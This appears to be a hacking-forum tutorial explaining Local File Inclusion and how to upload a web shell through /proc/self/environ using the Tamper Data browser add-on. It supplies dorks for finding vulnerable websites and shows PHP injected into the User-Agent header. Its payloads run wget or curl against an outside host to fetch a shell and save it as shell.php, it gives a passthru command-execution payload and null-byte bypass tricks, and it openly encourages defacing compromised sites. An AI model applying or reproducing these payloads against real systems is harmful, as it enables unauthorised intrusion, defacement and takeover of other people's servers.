LFI and Shell Upload with Tamper Data

Hello Friends, today I'm Publishing a tutorial on what is LFI , and how to Upload Shell with Tamper Data in LFI and vulnrable website

LFI means Local File Inclusion, its gives you access to read files on a website/server via your  browser.

previously i Published a Post on LFI, you can read it here 

LFI  vulnerable website URL looks  like this:
Code:
www.website.com/index.php?page=/etc/passwd


Here's what the code looks like that makes it vulnerable.

<?php
   $file = $_GET['file'];
   if(isset($file))
   {
  include("pages/$file");
   }
   else
   {
  include("index.php");
   }
   ?>

Few Things You Need for this Method


1. FireFox [download]
2. Tamper Data [download]
3. Vulnerable Sites [Get it here]



or use these dorks for finding vulnrable websites
inurl:index.php?homepage=
inurl:index.php?page=
inurl:index.php?index2=

Now i'm showing  how to exploit LFI and upload your shell via /proc/self/environ using Tamper data


So after selecting a vulnrable website, check /etc/passwd.
Your page should come up with something that looks like this.



 

 Full size Image : click here

Great !!, now you are sure  that website is vulnerable.
Now check for /proc/self/environ
So change your path to /proc/self/environ


Your page will look  like this if the file exists,
Note - not all websites have it.



Full size image : Click here

i'm interested in,  HTTP_USER_AGENT. now i'm going to change our user agent to try and get data from the site by injecting code where our browsers user agent should be.


To do this, i am going to use tamperdata. Once you have it installed, go to your options, and go to TamperData.

 


Now you will got a  window looks like this.




your page Must still be /proc/self/environ
Click Start Tamper, and refresh your page.


 i'll try some code injection.
After start tampering, you should see a window  looks  like this



Full size image : Click Here



In the User-Agent field, type this 


<?php phpinfo();?>


Now vulnrable website is down loading, 
you will see something like this if you did it correctly

Full size Image : click here

Now we can execute code, so let's upload upload your shell 


Open TamperData again, click start tamper, and refresh  website. and This time in the User-Agent enter this


<?exec('wget http://www.site.com/shell.txt -O shell.php');?>


It will look like this

Full size image : Click here

it downloads  text file, and renames it as a php file 
You can upload your shell as a text file using free webhosting...
I already shelled a website, so I am going to use that website as file hosting


when you're done with that, you can access your shell directly by going to http://site/shell.php


If you getting an error, try using the same method as when you got your 
http://www.site.com/index.php?page=/etc/passwd
upload your shell by using the same method.
http://www.site.com/index.php?page=shell.php


If it loads fine the second time, you can upload a your deface using shell... checkout best deface pages here
When you are done, you have a  shell, like this <3

Full size Image : Click Here

Alternate Method :
Some websites having extra precaution to prevent attacks like these.
so use this alternate method.


Change your user agent to:


<? passthru($_GET['cmd']); ?>


Now load website as
/proc/self/environ?cmd=curl http://www.site.com/shell.txt -o shell.php
 your url should look like
http://www.vulnerablesite.com/index.php?page=/proc/self/environ?cmd=curl http://www.yoursite.com/shell.txt -o shell.php


Now hopefully your shell uploaded.


Null Bytes


Adding a , or a nullbyte sometimes filters the site, and you can get around the firewalls.
http://www.site.com/index.php?page=/etc/passwd


written by  -DownFall